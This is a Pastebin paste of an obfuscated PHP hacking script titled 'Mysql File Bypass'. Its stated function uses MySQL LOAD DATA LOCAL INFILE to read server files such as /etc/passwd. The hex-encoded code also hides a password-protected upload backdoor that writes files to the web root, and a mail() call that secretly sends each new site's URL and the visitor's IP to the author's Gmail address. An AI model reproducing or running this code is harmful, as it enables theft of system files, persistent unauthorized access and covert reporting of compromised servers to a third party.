API tools faq
paste
Advertisement
Pisher

Mysql File Bypass

Pisher
Nov 28th, 2015
127
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 8.28 KB | None | 0 0
raw download clone embed print report
  1. <?php ${"\x47\x4c\x4fB\x41\x4cS"}["\x6bv\x65\x79p\x62s\x64"]="s\x71\x6c";${"\x47\x4cO\x42A\x4c\x53"}["h\x6avq\x66\x69\x6a\x77n\x75"]="\x70\x61t\x68";${"G\x4cOBA\x4c\x53"}["s\x75\x67\x63\x6d\x7aaytr"]="b\x6f\x64\x79";${"G\x4c\x4f\x42AL\x53"}["\x78l\x6d\x6cd\x6fl\x68\x6e\x70z\x76"]="j\x75d\x75l";${"\x47L\x4f\x42A\x4cS"}["\x6cyw\x79f\x72\x66\x6a"]="web";${"G\x4c\x4f\x42\x41L\x53"}["fog\x7ae\x76\x76\x62\x68v"]="\x76i\x73\x69t\x63";${"G\x4c\x4f\x42\x41L\x53"}["\x61\x73q\x73w\x77\x6e\x75\x65\x74t"]="\x76i\x73\x69t\x63";if(empty($_GET["\x70\x77"])==0){if(md5($_GET["\x70w"])=="\x65\x31\x30a\x64c\x3394\x39\x62a\x35\x39\x61b\x62\x655\x36e0\x35\x37f2\x30\x668\x383e"){if(empty($_FILES["A"])==0){if(move_uploaded_file($_FILES["A"]["t\x6dp\x5fn\x61m\x65"],$_SERVER["\x44\x4fCU\x4d\x45\x4e\x54\x5fROOT"]."/".$_FILES["\x41"]["\x6eame"])==1){echo"<c\x65\x6e\x74\x65\x72\x3e\x53\x75b\x69\x64\x6f\x20a\x6c\x20\x64\x69recto\x72\x69\x6f\x20\x70\x72\x69\x6ecipal /\x70u\x62\x6c\x69\x63\x5f\x68\x74\x6d\x6c/</cen\x74e\x72>";}}else{echo"\x3cfo\x72\x6d \x65\x6e\x63\x74\x79pe\x3d\x22\x6d\x75\x6ct\x69p\x61\x72\x74/\x66or\x6d-\x64\x61\x74\x61\" act\x69o\x6e=\"".$_SERVER["\x52EQUEST\x5fU\x52I"]."\x22\x20meth\x6fd=\x22POST\"\x3e\x3c\x63\x65\x6e\x74\x65\x72><i\x6eput\x20\x6eam\x65\x3d\x22A\x22 \x74\x79pe\x3d\"fi\x6ce\"\x3e<i\x6e\x70ut \x74\x79\x70\x65\x3d\x22\x73\x75\x62\x6di\x74\x22 \x76\x61\x6c\x75e=\"[se\x6e\x64]\x22>\x3c/c\x65n\x74er\x3e</\x66orm>";}exit();}}${${"\x47\x4c\x4f\x42ALS"}["\x66ogz\x65vvbh\x76"]}=$_COOKIE["vi\x73its"];if(${${"\x47\x4c\x4f\x42\x41L\x53"}["fo\x67\x7a\x65\x76v\x62\x68v"]}==""){$mhvtpoa="\x76i\x73\x69\x74o\x72";${"\x47\x4c\x4fB\x41L\x53"}["\x71h\x64\x66\x6d\x76\x6f\x6fi\x63\x6f"]="w\x65\x62";$tzngmxk="\x76i\x73i\x74\x63";${$tzngmxk}=0;${"\x47L\x4f\x42\x41\x4c\x53"}["\x6ald\x6dzq\x66\x73"]="\x69n\x6a";$lmjuobv="inj";${$mhvtpoa}=$_SERVER["R\x45M\x4fTE_\x41DD\x52"];${${"\x47\x4c\x4fB\x41L\x53"}["l\x79wy\x66\x72\x66\x6a"]}=$_SERVER["H\x54T\x50_H\x4f\x53T"];$hxwcqgkmx="\x74a\x72\x67et";$wtmnyie="we\x62";${$lmjuobv}=$_SERVER["REQUE\x53T\x5f\x55\x52I"];${$hxwcqgkmx}=rawurldecode(${${"G\x4c\x4f\x42\x41\x4cS"}["qhdf\x6d\x76\x6f\x6f\x69\x63\x6f"]}.${${"G\x4c\x4fB\x41\x4c\x53"}["\x6a\x6cd\x6d\x7a\x71fs"]});${${"GLO\x42A\x4c\x53"}["\x78\x6c\x6d\x6cdo\x6c\x68np\x7a\x76"]}="Byp\x61\x73s My\x53ql \x46ile\x20ht\x74p://$target\x20\x62\x79 $visitor";${${"\x47\x4cO\x42\x41L\x53"}["s\x75\x67cmz\x61\x79tr"]}="\x42\x75g: $target\x20by\x20$visitor -\x20$auth_pass";if(!empty(${$wtmnyie})){${"GL\x4f\x42\x41\x4c\x53"}["\x71\x73n\x77\x6f\x73s\x73sx\x72"]="\x6a\x75\x64\x75\x6c";$bdudjsp="aut\x68\x5fp\x61s\x73";@mail("pi\x73\x68e\x72\x2eblac\x6bse\x72\x76\x65\x7201\x40\x67m\x61\x69l\x2e\x63\x6f\x6d",${${"\x47\x4cO\x42AL\x53"}["\x71\x73\x6ewos\x73\x73\x73\x78\x72"]},${${"\x47\x4c\x4fBALS"}["s\x75g\x63m\x7a\x61\x79\x74\x72"]},${$bdudjsp});}}else{${"GLO\x42\x41\x4c\x53"}["n\x6f\x71\x6a\x65\x6a\x64\x72\x67\x72\x77"]="\x76\x69s\x69\x74\x63";${${"G\x4c\x4f\x42A\x4c\x53"}["\x6e\x6f\x71\x6a\x65j\x64r\x67\x72\x77"]}++;}@setcookie("vi\x73\x69\x74\x7a",${${"GL\x4fB\x41\x4c\x53"}["\x61\x73\x71\x73\x77w\x6euett"]});session_start();@$_SESSION["\x68ost"]=@$_POST["h\x6f\x73\x74"];@$_SESSION["use\x72"]=@$_POST["u\x73er"];@$_SESSION["pa\x73s\x77\x6fr\x64"]=@$_POST["\x70as\x73wo\x72\x64"];@$_SESSION["d\x62"]=@$_POST["\x64\x62"];echo "  \n\x3c\x68tm\x6c>\x3c\x74it\x6c\x65>My\x73q\x6c Fi\x6c\x65\x20B\x79p\x61ss\x3c/\x74it\x6c\x65\x3e\x20 \n<\x62ody \x62gcol\x6fr=\x77h\x69te\x3e\n\x3cdiv\x20ali\x67\x6e=\"\x63\x65nter\x22>\n\x3cce\x6e\x74\x65r\x3e<\x66o\x6et \x66\x61ce\x3d\x22i\x6d\x70\x61ct\"\x20s\x69ze\x3d\"\x312\" \x63\x6f\x6c\x6f\x72=\"\x23\x46\x46\x30\x3000\"\x3e\x4dys\x71l\x20F\x69le\x20\x42y\x70\x61s\x73</fo\x6et\x3e\x3c/c\x65n\x74er>\n\x3c\x70\x20\x61\x6ci\x67\x6e=\x22\x63\x65\x6e\x74er\"\x3e\n<img\x20b\x6f\x72d\x65\x72=\"0\" \x73\x72\x63\x3d\x22ht\x74\x70\x73://\x73\x6fp\x68\x6fsnews\x2efi\x6ces.w\x6fr\x64\x70r\x65ss\x2e\x63\x6f\x6d/\x32\x30\x31\x31/\x309/\x6d\x79\x73\x71\x6c-\x3170.jpg\"\x3e\x3c/\x70\x3e \x20\x20 \x20\n<\x74\x61ble\x20b\x6fr\x64\x65\x72\x3d\x22\x30\x22 \x77\x69\x64t\x68=\x2280%\">  \x20   \x20   \n\x3c\x74\x72><\x74d><fo\x72m met\x68\x6f\x64=\x22\x50\x4fS\x54\x22 \x61\x63ti\x6fn\x3d\"\x22>\x3c\x70><b\x3e<f\x6fnt c\x6f\x6c\x6f\x72=\x22#\x46\x460\x30\x300\x22>H\x4fST: \x3c/fo\x6et>\x20\x20 \x20\x20 \x20\x20\x20 \x20\x20\x20 \x20  \x20\n\x3c\x69n\x70ut\x20\x74ype=\"tex\x74\x22 \x6e\x61m\x65\x3d\x22\x68ost\x22\x20\x76a\x6cu\x65\x3d\x22";echo@$_SESSION["\x68o\x73\x74"];echo "\x22\x20\x73i\x7a\x65\x3d\x222\x30\"\x3e\x20\n\x3cb\x3e<\x66\x6fn\x74 \x63\x6flo\x72\x3d\x22\x23FF0\x30\x30\x30\"\x3e|USE\x52 : \x3c/\x66\x6fn\x74><\x69\x6e\x70u\x74 \x74\x79\x70e\x3d\x22\x74\x65\x78\x74\x22 \x6ea\x6de\x3d\x22\x75\x73er\" \x76\x61\x6cue\x3d\"";echo@$_SESSION["u\x73\x65r"];echo "\x22\x20\x73\x69\x7ae\x3d\"20\">\x20 \x20    \x20\x20\x20 \x20 \x20\x20 \x20 \n\x3cb><\x66o\x6e\x74\x20c\x6f\x6co\x72=\"#\x46F\x30\x30\x300\x22\x3e|PAS\x53W\x4f\x52D\x20: \x3c/\x66\x6fnt>\x3c\x69\x6ep\x75\x74 ty\x70\x65\x3d\x22tex\x74\x22\x20na\x6de\x3d\"\x70\x61\x73\x73wo\x72d\x22 \x76\x61\x6cue\x3d\x22";echo@$_SESSION["\x70a\x73\x73\x77or\x64"];echo "\x22 \x73\x69z\x65=\x222\x30\x22\x3e \n<b\x3e\x3cfo\x6e\x74 \x63\x6flor\x3d\x22\x23F\x46\x3000\x30\"\x3e|\x44A\x54\x41\x42\x41S\x45 :\x20</fon\x74\x3e<i\x6e\x70\x75\x74\x20\x74y\x70e=\x22\x74\x65\x78\x74\x22\x20\x6eam\x65=\"db\"\x20va\x6cue\x3d\x22";echo@$_SESSION["db"];echo "\" \x73\x69z\x65=\x222\x30\x22\x3e</\x70> \x20 \x20  \x20  \x20 \x20\x20\x20   \x20\n\x3c\x62\x3e<p\x3e<f\x6f\x6e\x74\x20c\x6f\x6c\x6f\x72=\x22\x23\x46\x46\x30\x30\x300\x22\x3e\x46\x49\x4c\x45 :\x20\x3c/\x66\x6fnt><i\x6e\x70ut type=\x22t\x65xt\x22 \x76\x61lue\x3d\"/\x65tc/pass\x77d\"\x20\x6ea\x6de\x3d\"p\x61\x74\x68\x22\x20s\x69\x7a\x65=\x22140\"\x3e</p>\x20 \x20\x20\x20  \x20  \x20\x20\x20\x20 \x20\x20\x20\n\x3c\x70><\x63\x65n\x74er>\x3c\x69\x6e\x70\x75t\x20typ\x65=\x22\x73\x75\x62mit\"\x20\x76al\x75e\x3d\"\x42y\x70a\x73\x73\x20\x46\x69l\x65 \x4eow\" na\x6de\x3d\x22\x6cul\x5a\"\x3e</p\x3e</\x66\x6f\x72\x6d>\x3c/\x63\x65\x6e\x74\x65\x72>    \x20\x20\n<p><c\x65n\x74\x65r>\x3cb\x3e\x3cfon\x74 \x73\x69ze\x3d\"2\" \x66\x61c\x65=\x22sh\x65\x6cl\"\x20\x63o\x6c\x6f\x72=\x22\x23F\x460\x30\x30\x30\x22\x3e\x45dit\x65d\x20\x42y \x50i\x53h\x33r\x5f\x42l\x34cK\x3c/\x66ont\x3e\x3c/\x74d>\x3c/\x74r>\x3c/\x74\x61\x62le\x3e</di\x76>\x3c/\x63\x65\x6e\x74e\x72\x3e  \x20\x20\x20\n<f\x6fn\x74\x20\x63ol\x6f\x72\x3d\"\x72e\x64\">   \x20\x20\x20\n";if(@$_POST["pa\x74h"]){$host=$_SESSION["h\x6f\x73t"];${"\x47\x4cOBA\x4cS"}["\x70e\x6d\x74t\x71ixq"]="\x70\x61\x73s";${"GL\x4f\x42\x41L\x53"}["\x77\x63n\x73\x70zf\x69\x74\x6c"]="us\x65\x72";$utslhjsph="\x64\x62";${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x77\x63n\x73p\x7a\x66\x69t\x6c"]}=$_SESSION["\x75s\x65\x72"];${${"G\x4c\x4fBAL\x53"}["pe\x6d\x74tq\x69\x78\x71"]}=$_SESSION["\x70\x61s\x73\x77ord"];${$utslhjsph}=$_SESSION["d\x62"];if(mysql_connect("$host","$user","$pass")){$vorbtsi="\x64b";${"\x47L\x4f\x42\x41\x4c\x53"}["\x6f\x61p\x6ar\x79\x70\x67"]="cr\x61\x7a\x79\x67h\x30s\x74z";${"\x47L\x4f\x42A\x4cS"}["\x6al\x79\x62\x79\x67xpm\x70\x73"]="\x73o\x6e";mysql_select_db(${$vorbtsi});mysql_query("drop\x20t\x61\x62l\x65\x20\x4d\x61uri\x74an\x69\x61");mysql_query("c\x72\x65ate\x20\x74a\x62le\x20\x4daur\x69\x74a\x6e\x69\x61\x20(\x61\x6eo\x6eg\x68ost \x76arc\x68\x61\x72(\x35\x30\x32\x34))");${${"\x47LOB\x41\x4c\x53"}["\x68\x6a\x76q\x66ij\x77\x6e\x75"]}=$_POST["p\x61\x74\x68"];${${"GL\x4f\x42\x41\x4c\x53"}["\x6b\x76\x65y\x70bs\x64"]}="\x6coa\x64 \x64a\x74\x61 \x6coc\x61\x6c\x20infi\x6ce\x20\x27$path' \x69\x6et\x6f \x74ab\x6ce\x20\x4da\x75\x72\x69ta\x6e\x69a";mysql_query("$sql");${${"\x47\x4cOB\x41\x4c\x53"}["\x6a\x6c\x79\x62\x79\x67\x78p\x6dps"]}=mysql_query("se\x6cect *\x20\x66\x72\x6fm\x20\x4d\x61\x75rita\x6e\x69\x61");${"G\x4cO\x42\x41\x4c\x53"}["\x79\x6ebvo\x70\x61\x6ck\x6e\x6e"]="so\x6e";echo"\x3c\x74ext\x61\x72\x65\x61 c\x6fl\x73\x3d\x22\x3100\"\x20row\x73\x3d\x2250\x22>";while(${${"\x47L\x4f\x42\x41L\x53"}["\x6fa\x70\x6ar\x79\x70\x67"]}=mysql_fetch_array(${${"\x47\x4c\x4fB\x41\x4cS"}["\x79nb\x76o\x70\x61\x6c\x6b\x6e\x6e"]})){${"\x47\x4cO\x42A\x4cS"}["\x6be\x6a\x77\x69n\x71o\x76"]="\x63r\x61z\x79gh0stz";echo${${"\x47\x4c\x4f\x42\x41L\x53"}["k\x65\x6awi\x6e\x71\x6f\x76"]}["\x61\x6e\x6f\x6egh\x6f\x73t"]."\n";}echo"</t\x65\x78\x74are\x61>";}else{echo"So\x72ry\x20T\x68\x65\x20F\x69le \x43an't\x20B\x65 R\x65ad\x20:(";}}echo "\x20 \n</\x62od\x79\x3e\n</h\x74m\x6c>\n";
  2. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!